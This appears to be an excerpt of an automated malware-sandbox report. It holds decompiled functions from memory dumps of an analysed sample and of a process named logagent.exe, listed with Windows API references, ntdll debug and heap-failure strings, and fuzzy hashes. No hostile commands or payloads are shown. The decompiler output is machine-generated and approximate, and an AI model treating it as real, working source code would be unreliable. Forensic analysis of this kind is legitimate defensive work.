E00422DC8(int _a4) { void* __ebx; void* __ebp; signed int _t2; signed int _t3; int _t8; void* _t12; void* _t13; void* _t17; void* _t18; _t8 = _a4; if( *0x466338 == 0) { *0x466310 = E00422CE4(0, _t8, *0x466310, _t17, _t18); return GetSystemMetrics(_t8); } _t3 = _t2 | 0xffffffff; _t12 = _t8 + 0xffffffb4 - 2; __eflags = _t12; if(__eflags < 0) { _t3 = 0; } else { if(__eflags == 0) { _t8 = 0; } else { _t13 = _t12 - 1; __eflags = _t13; if(_t13 == 0) { _t8 = 1; } else { __eflags = _t13 - 0xffffffffffffffff; if(_t13 - 0xffffffffffffffff < 0) { _t3 = 1; } } } } __eflags = _t3 - 0xffffffff; if(_t3 != 0xffffffff) { return _t3; } else { return GetSystemMetrics(_t8); } } 0x00422dcc 0x00422dd6 0x00422dea 0x00000000 0x00422df0 0x00422df8 0x00422e00 0x00422e00 0x00422e03 0x00422e17 0x00422e05 0x00422e05 0x00422e1b 0x00422e07 0x00422e07 0x00422e07 0x00422e08 0x00422e1f 0x00422e0a 0x00422e0b 0x00422e0e 0x00422e10 0x00422e10 0x00422e0e 0x00422e08 0x00422e05 0x00422e24 0x00422e27 0x00422e31 0x00422e29 0x00000000 0x00422e2a

APIs

GetSystemMetrics.USER32 ref: 00422E2A Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63 GetSystemMetrics.USER32 ref: 00422DF0

Strings

GetSystemMetrics , xrefs: 00422DD8

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc String ID: GetSystemMetrics API String ID: 1792783759-96882338 Opcode ID: c25a38d46c1e4ffea5b60ab85707767b0b04cc81a25b6e54c2e579306e5f87fa Instruction ID: 5fc931f2355d86599297f92dc66c6923be0ac5e92dc587121fe74810b58b28c3 Opcode Fuzzy Hash: c25a38d46c1e4ffea5b60ab85707767b0b04cc81a25b6e54c2e579306e5f87fa Instruction Fuzzy Hash: A5F062307141507ACA254A38BE842267546AB45330FE25B37E5229A2D5DFFC8C91A25E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 61%

E0043369C(void* __eax) { signed char _v17; signed char _v24; signed int _t8; asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t8 = _v24 & 0x000000ff; if(_t8 != 0) { if(GetKeyState(0x10) < 0) { _t8 = _t8 + 0x2000; } if(GetKeyState(0x11) < 0) { _t8 = _t8 + 0x4000; } if((_v17 & 0x00000020) != 0) { _t8 = _t8 + 0x8000; } } return _t8; } 0x004336a7 0x004336a8 0x004336a9 0x004336aa 0x004336ab 0x004336b3 0x004336bf 0x004336c1 0x004336c1 0x004336d0 0x004336d2 0x004336d2 0x004336dc 0x004336de 0x004336de 0x004336dc 0x004336eb

APIs

GetKeyState.USER32(00000010), ref: 004336B7 GetKeyState.USER32(00000011), ref: 004336C8

Strings

, xrefs: 004336D7

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: State String ID: API String ID: 1649606143-3916222277 Opcode ID: 214cf5a452d32b715b633cccca3f99564eca22495acae71db1ba112392d63aef Instruction ID: 8f684c87d4741464f805386feb5dbb40cfecca0e0810653843f36d644f5af4db Opcode Fuzzy Hash: 214cf5a452d32b715b633cccca3f99564eca22495acae71db1ba112392d63aef Instruction Fuzzy Hash: 6FE02B2270464226E62179552C063D713904F417A9F0D066BBDC42B2C2D29F0B1550AA

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: logagent.exe PID: 6664 Parent PID: 5352 logagent.exeCOMMON

Executed Functions

APIs

LdrInitializeThunk.NTDLL ref: 010F991A

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: bad0ff05137418b64c42b86367529988bf70abdb93236c477866ac7c7f041382 Instruction ID: 265114da11572675a009b4c60de04f7c5209ed21241de56456dd5cc878fff7ac Opcode Fuzzy Hash: bad0ff05137418b64c42b86367529988bf70abdb93236c477866ac7c7f041382 Instruction Fuzzy Hash: D79002B160100402D54571D956047460005A7D0341F51C015A5055558EC7D98DD576A5

Uniqueness

Uniqueness Score: -1.00%

APIs

LdrInitializeThunk.NTDLL ref: 010F954A

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: dcf73ab426b28c8d3f8806f65fc9a9fc06209ce2fa0aaecf9b931409b7830c57 Instruction ID: eef160581ece5b6be39f329254e7ca12e782575019b5e42257213824cc635a55 Opcode Fuzzy Hash: dcf73ab426b28c8d3f8806f65fc9a9fc06209ce2fa0aaecf9b931409b7830c57 Instruction Fuzzy Hash: 6D90027561100003050AA5D917045070046A7D5391351C025F1006554CD7E188616161

Uniqueness

Uniqueness Score: -1.00%

APIs

LdrInitializeThunk.NTDLL ref: 010F99AA

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: b89eb39028ab5688f1c13e5ebfeed3a169d6bf664db608fb19342296e5f9d237 Instruction ID: 1a25c1cd16a0f53fcd72a902df21b4954b81522da5dc6dd3ad8e1f5b08c02d70 Opcode Fuzzy Hash: b89eb39028ab5688f1c13e5ebfeed3a169d6bf664db608fb19342296e5f9d237 Instruction Fuzzy Hash: A99002B174100442D50561D95614B060005E7E1341F51C019E1055558DC7D9CC527166

Uniqueness

Uniqueness Score: -1.00%

APIs

LdrInitializeThunk.NTDLL ref: 010F95DA

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: bd2160619b82b92714bb2e10b999cb03e34529efa7192ef7415b4f0e3fcaed10 Instruction ID: 130cf6fc6214e052c402c45bf80025f77f0b1ee50206669c17a22e58264cf936 Opcode Fuzzy Hash: bd2160619b82b92714bb2e10b999cb03e34529efa7192ef7415b4f0e3fcaed10 Instruction Fuzzy Hash: 739002B160200003450A71D95614616400AA7E0341B51C025E1005594DC6E588917165

Uniqueness

Uniqueness Score: -1.00%

APIs

LdrInitializeThunk.NTDLL ref: 010F984A

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: a079af71d39ca0d1c7fa066df97dba45dcbd574263a389df9a64a94053acb7ca Instruction ID: 12d67d3d0da063a5779bd8177e8d1d94c4a6225134e3b3ba30625b12f43570b1 Opcode Fuzzy Hash: a079af71d39ca0d1c7fa066df97dba45dcbd574263a389df9a64a94053acb7ca Instruction Fuzzy Hash: 6A90027164204152594AB1D956045074006B7E0381791C016A1405954CC6E69856E661

Uniqueness

Uniqueness Score: -1.00%

APIs

LdrInitializeThunk.NTDLL ref: 010F986A

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: c40ff2ce8562ae2d7a663e391c8ba0778b54205705c6d283900e1edfe2a0eb40 Instruction ID: bdadd4f54973eeff8de63a5ac9665d15b518fae19f28cb2be87a7c9b53f86656 Opcode Fuzzy Hash: c40ff2ce8562ae2d7a663e391c8ba0778b54205705c6d283900e1edfe2a0eb40 Instruction Fuzzy Hash: 4290027160100413D51661D957047070009A7D0381F91C416A041555CDD7D68952B161

Uniqueness

Uniqueness Score: -1.00%

APIs

LdrInitializeThunk.NTDLL ref: 010F98FA

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: 78a6abfc8e95a8e96bfac8645358cde481a3ca74c4aea027fa29cfb8d109ac2e Instruction ID: d2d954934aa6753a116697e5796cbca5cb7651a7201f10ca7ca7bd56da468612 Opcode Fuzzy Hash: 78a6abfc8e95a8e96bfac8645358cde481a3ca74c4aea027fa29cfb8d109ac2e Instruction Fuzzy Hash: A2900271A0100502D50671D95604616000AA7D0381F91C026A1015559ECBE58992B171

Uniqueness

Uniqueness Score: -1.00%

APIs

LdrInitializeThunk.NTDLL ref: 010F971A

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: 12c26b61616d292c9640572a4f45e45c60306d9ce40f5c2f4f573c19b6abc390 Instruction ID: 325e81858735b0ecf23ace190357220518b4a77dabfe72e4ea435a705170d1d7 Opcode Fuzzy Hash: 12c26b61616d292c9640572a4f45e45c60306d9ce40f5c2f4f573c19b6abc390 Instruction Fuzzy Hash: 0F90027160100402D50565D966086460005A7E0341F51D015A5015559EC7E588917171

Uniqueness

Uniqueness Score: -1.00%

APIs

LdrInitializeThunk.NTDLL ref: 010F978A

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: eb04b1d59912049d0041b43981a53974c69542ae562f15913f7d90426611401c Instruction ID: 2ddf1da5be036aaa7ab78c0894adc860af4ac6471e52a2f9e8fe41a8635ad593 Opcode Fuzzy Hash: eb04b1d59912049d0041b43981a53974c69542ae562f15913f7d90426611401c Instruction Fuzzy Hash: 8090027961300002D58571D9660860A0005A7D1342F91D419A000655CCCAD588696361

Uniqueness

Uniqueness Score: -1.00%

APIs

LdrInitializeThunk.NTDLL ref: 010F97AA

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: 6b88498f1a6ad8df49e8bd186f8944e2ebe410dbebea146153cb51c9850f1f7a Instruction ID: 99567f19d8ff02331ab08ad1ac29ce06fc1cd0fc7bf732713824fcea3f9ddb8f Opcode Fuzzy Hash: 6b88498f1a6ad8df49e8bd186f8944e2ebe410dbebea146153cb51c9850f1f7a Instruction Fuzzy Hash: E790027170100003D54571D966186064005F7E1341F51D015E0405558CDAD588566262

Uniqueness

Uniqueness Score: -1.00%

APIs

LdrInitializeThunk.NTDLL ref: 010F9FEA

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: 96eab8f2331156addbe6b6a5f6e38e7a7957547c2a10f054a37cbceaf74e250f Instruction ID: f1ad5182df541f9e4de8a74b4f3b0a960598465730aa2632b35eda3e7bc0384e Opcode Fuzzy Hash: 96eab8f2331156addbe6b6a5f6e38e7a7957547c2a10f054a37cbceaf74e250f Instruction Fuzzy Hash: 5790027171114402D51561D996047060005A7D1341F51C415A081555CDC7D588917162

Uniqueness

Uniqueness Score: -1.00%

APIs

LdrInitializeThunk.NTDLL ref: 010F9A0A

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: 6312dc9d86751c55430c2eff1505241c6498c6d8b143a8f03d4da1bcc747527a Instruction ID: 237fc09feb6f535907aee1aa9db64dd4a9a3cc92b0d28313b6ee670c61450b88 Opcode Fuzzy Hash: 6312dc9d86751c55430c2eff1505241c6498c6d8b143a8f03d4da1bcc747527a Instruction Fuzzy Hash: B990027160140402D50561D95A1470B0005A7D0342F51C015A1155559DC7E5885175B1

Uniqueness

Uniqueness Score: -1.00%

APIs

LdrInitializeThunk.NTDLL ref: 010F9A2A

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: 2f4c3fc75c87b8b2d67dd8291fa5e6d3b515325cc8c2cfed96653a01a7aa56bf Instruction ID: 132870921965155216ed62baad54e00de34344280f271b39aa2e93e3b7663e54 Opcode Fuzzy Hash: 2f4c3fc75c87b8b2d67dd8291fa5e6d3b515325cc8c2cfed96653a01a7aa56bf Instruction Fuzzy Hash: E2900271A0100042454571E99A449064005BBE1351751C125A0989554DC6D9886566A5

Uniqueness

Uniqueness Score: -1.00%

APIs

LdrInitializeThunk.NTDLL ref: 010F9A5A

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: c509421b81adfde94b524689cee8de9417b4c9d25b269558399c21100d0ae8ac Instruction ID: f687567509220d6472929e8fa923be0f77c1fde09609f50bd035caf3a21340c5 Opcode Fuzzy Hash: c509421b81adfde94b524689cee8de9417b4c9d25b269558399c21100d0ae8ac Instruction Fuzzy Hash: 9E90027161180042D60565E95E14B070005A7D0343F51C119A0145558CCAD588616561

Uniqueness

Uniqueness Score: -1.00%

APIs

LdrInitializeThunk.NTDLL ref: 010F966A

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: d1da726b3211757d10a6c261e05a6945b3b92d5b0aa76a12ff2cc0c141f55dd2 Instruction ID: 7b3aa78926149baec460cf22497976ad43f66a22c1fcca9d860c5295394e9c30 Opcode Fuzzy Hash: d1da726b3211757d10a6c261e05a6945b3b92d5b0aa76a12ff2cc0c141f55dd2 Instruction Fuzzy Hash: F790027160100802D58571D9560464A0005A7D1341F91C019A0016658DCBD58A5977E1

Uniqueness

Uniqueness Score: -1.00%

APIs

LdrInitializeThunk.NTDLL ref: 010F96EA

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: abe3bb2be54b12107b4e25728a62721550012e299fea4fe33af66f4f8c5d84b4 Instruction ID: 6d695e16418302ebb9531eab95ecc135a76dc941f60381eff3f7fb45b2003605 Opcode Fuzzy Hash: abe3bb2be54b12107b4e25728a62721550012e299fea4fe33af66f4f8c5d84b4 Instruction Fuzzy Hash: 8F90027160108802D51561D9960474A0005A7D0341F55C415A441565CDC7D588917161

Uniqueness

Uniqueness Score: -1.00%

APIs

LdrInitializeThunk.NTDLL ref: 010F9694

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: 238c062a9c01c46bf21b1b6adff751b25c3bf8e46bb6e2d85196a422652fc815 Instruction ID: dede3da8d8a84dffb8c40c52cc24b8d6d3e285f2b6b5d455bb821104c0c54926 Opcode Fuzzy Hash: 238c062a9c01c46bf21b1b6adff751b25c3bf8e46bb6e2d85196a422652fc815 Instruction Fuzzy Hash: 85B09B71D014C5C5DA56D7E557087177A407BD4745F16C055E2420685B87B8C091F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Strings

*** Inpage error in %ws:%s , xrefs: 0116B418 *** then kb to get the faulting stack , xrefs: 0116B51C write to , xrefs: 0116B4A6 The resource is owned shared by %d threads , xrefs: 0116B37E *** Critical Section Timeout (%p) in %ws:%s , xrefs: 0116B39B This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked. , xrefs: 0116B305 *** Restarting wait on critsec or resource at %p (in %ws:%s) , xrefs: 0116B53F The instruction at %p referenced memory at %p. , xrefs: 0116B432 The critical section is owned by thread %p. , xrefs: 0116B3B9 *** Unhandled exception 0x%08lx, hit in %ws:%s , xrefs: 0116B2DC If this bug ends up in the shipping product, it could be a severe security hole. , xrefs: 0116B314 This failed because of error %Ix. , xrefs: 0116B446 This means that the I/O device reported an I/O error. Check your hardware. , xrefs: 0116B476 *** An Access Violation occurred in %ws:%s , xrefs: 0116B48F <unknown> , xrefs: 0116B27E, 0116B2D1, 0116B350, 0116B399, 0116B417, 0116B48E The resource is unowned. This usually implies a slow-moving machine due to memory pressure , xrefs: 0116B38F Go determine why that thread has not released the critical section. , xrefs: 0116B3C5 *** A stack buffer overrun occurred in %ws:%s , xrefs: 0116B2F3 *** Resource timeout (%p) in %ws:%s , xrefs: 0116B352 an invalid address, %p , xrefs: 0116B4CF The stack trace should show the guilty function (the function directly above __report_gsfailure). , xrefs: 0116B323 read from , xrefs: 0116B4AD, 0116B4B2 *** enter .cxr %p for the context , xrefs: 0116B50D This means the data could not be read, typically because of a bad block on the disk. Check your hardware. , xrefs: 0116B47D This means the machine is out of memory. Use !vm to see where all the memory is being used. , xrefs: 0116B484 *** enter .exr %p for the exception record , xrefs: 0116B4F1 The resource is owned exclusively by thread %p , xrefs: 0116B374 The critical section is unowned. This usually implies a slow-moving machine due to memory pressure , xrefs: 0116B3D6 a NULL pointer , xrefs: 0116B4E0 The instruction at %p tried to %s , xrefs: 0116B4B6

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to API String ID: 0-108210295 Opcode ID: db93ac31f77e2dd09008d53b1ba92578ad6bfd58eefe517a1b1d5c93301cb9bf Instruction ID: 9fa9afd322e9e80fd9be109e49adcf362aeab08a2cb36010f75355080cde0e40 Opcode Fuzzy Hash: db93ac31f77e2dd09008d53b1ba92578ad6bfd58eefe517a1b1d5c93301cb9bf Instruction Fuzzy Hash: E1812731B48210FFDB2DAB8ACC45DBB3B2AEF56B96F810058F5059F112D3628461C7B6

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 44%

E01171C06() { signed int _t27; char* _t104; char* _t105; intOrPtr _t113; intOrPtr _t115; intOrPtr _t117; intOrPtr _t119; intOrPtr _t120; _t105 = 0x10948a4; _t104 = "HEAP: "; if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) { _push(_t104); E010BB150(); } else { E010BB150("HEAP[%wZ]: ", *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c); } _push( *0x11a589c); E010BB150("Heap error detected at %p (heap handle %p)\n", *0x11a58a0); _t27 = *0x11a5898; // 0x0 if(_t27 <= 0xf) { switch( *((intOrPtr*)(_t27 * 4 + &M01171E96))) { case 0: _t105 = "heap_failure_internal"; goto L21; case 1: goto L21; case 2: goto L21; case 3: goto L21; case 4: goto L21; case 5: goto L21; case 6: goto L21; case 7: goto L21; case 8: goto L21; case 9: goto L21; case 0xa: goto L21; case 0xb: goto L21; case 0xc: goto L21; case 0xd: goto L21; case 0xe: goto L21; case 0xf: goto L21; } } L21: if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) { _push(_t104); E010BB150(); } else { E010BB150("HEAP[%wZ]: ", *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c); } _push(_t105); E010BB150("Error code: %d - %s\n", *0x11a5898); _t113 = *0x11a58a4; // 0x0 if(_t113 != 0) { if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) { _push(_t104); E010BB150(); } else { E010BB150("HEAP[%wZ]: ", *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c); } E010BB150("Parameter1: %p\n", *0x11a58a4); } _t115 = *0x11a58a8; // 0x0 if(_t115 != 0) { if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) { _push(_t104); E010BB150(); } else { E010BB150("HEAP[%wZ]: ", *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c); } E010BB150("Parameter2: %p\n", *0x11a58a8); } _t117 = *0x11a58ac; // 0x0 if(_t117 != 0) { if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) { _push(_t104); E010BB150(); } else { E010BB150("HEAP[%wZ]: ", *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c); } E010BB150("Parameter3: %p\n", *0x11a58ac); } _t119 = *0x11a58b0; // 0x0 if(_t119 != 0) { L41: if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) { _push(_t104); E010BB150(); } else { E010BB150("HEAP[%wZ]: ", *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c); } _push( *0x11a58b4); E010BB150("Last known valid blocks: before - %p, after - %p\n", *0x11a58b0); } else { _t120 = *0x11a58b4; // 0x0 if(_t120 != 0) { goto L41; } } if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) { _push(_t104); E010BB150(); } else { E010BB150("HEAP[%wZ]: ", *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c); } return E010BB150("Stack trace available at %p\n", 0x11a58c0); } 0x01171c10 0x01171c16 0x01171c1e 0x01171c3d 0x01171c3e 0x01171c20 0x01171c35 0x01171c3a 0x01171c44 0x01171c55 0x01171c5a 0x01171c65 0x01171c67 0x00000000 0x01171c6e 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x01171c67 0x01171cdc 0x01171ce5 0x01171d04 0x01171d05 0x01171ce7 0x01171cfc 0x01171d01 0x01171d0b 0x01171d17 0x01171d1f 0x01171d25 0x01171d30 0x01171d4f 0x01171d50 0x01171d32 0x01171d47 0x01171d4c 0x01171d61 0x01171d67 0x01171d68 0x01171d6e 0x01171d79 0x01171d98 0x01171d99 0x01171d7b 0x01171d90 0x01171d95 0x01171daa 0x01171db0 0x01171db1 0x01171db7 0x01171dc2 0x01171de1 0x01171de2 0x01171dc4 0x01171dd9 0x01171dde 0x01171df3 0x01171df9 0x01171dfa 0x01171e00 0x01171e0a 0x01171e13 0x01171e32 0x01171e33 0x01171e15 0x01171e2a 0x01171e2f 0x01171e39 0x01171e4a 0x01171e02 0x01171e02 0x01171e08 0x00000000 0x00000000 0x01171e08 0x01171e5b 0x01171e7a 0x01171e7b 0x01171e5d 0x01171e72 0x01171e77 0x01171e95

Strings

Last known valid blocks: before - %p, after - %p , xrefs: 01171E45 Parameter3: %p , xrefs: 01171DEE HEAP[%wZ]: , xrefs: 01171C30, 01171CF7, 01171D42, 01171D8B, 01171DD4, 01171E25, 01171E6D Error code: %d - %s , xrefs: 01171D12 heap_failure_freelists_corruption , xrefs: 01171CC9 HEAP: , xrefs: 01171C16, 01171C3D, 01171D04, 01171D4F, 01171D98, 01171DE1, 01171E32, 01171E7A Stack trace available at %p , xrefs: 01171E86 heap_failure_invalid_argument , xrefs: 01171CAD Parameter1: %p , xrefs: 01171D5C heap_failure_internal , xrefs: 01171C6E Parameter2: %p , xrefs: 01171DA5 heap_failure_buffer_overrun , xrefs: 01171C98 heap_failure_unknown , xrefs: 01171C75 Heap error detected at %p (heap handle %p) , xrefs: 01171C50 heap_failure_entry_corruption , xrefs: 01171C83 heap_failure_invalid_allocation_type , xrefs: 01171CB4 heap_failure_usage_after_free , xrefs: 01171CBB heap_failure_listentry_corruption , xrefs: 01171CD0 heap_failure_cross_heap_operation , xrefs: 01171CC2 heap_failure_buffer_underrun , xrefs: 01171C9F heap_failure_lfh_bitmap_mismatch , xrefs: 01171CD7 heap_failure_multiple_entries_corruption , xrefs: 01171C8A heap_failure_virtual_block_corruption , xrefs: 01171C91 heap_failure_generic , xrefs: 01171C7C heap_failure_block_not_busy , xrefs: 01171CA6

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

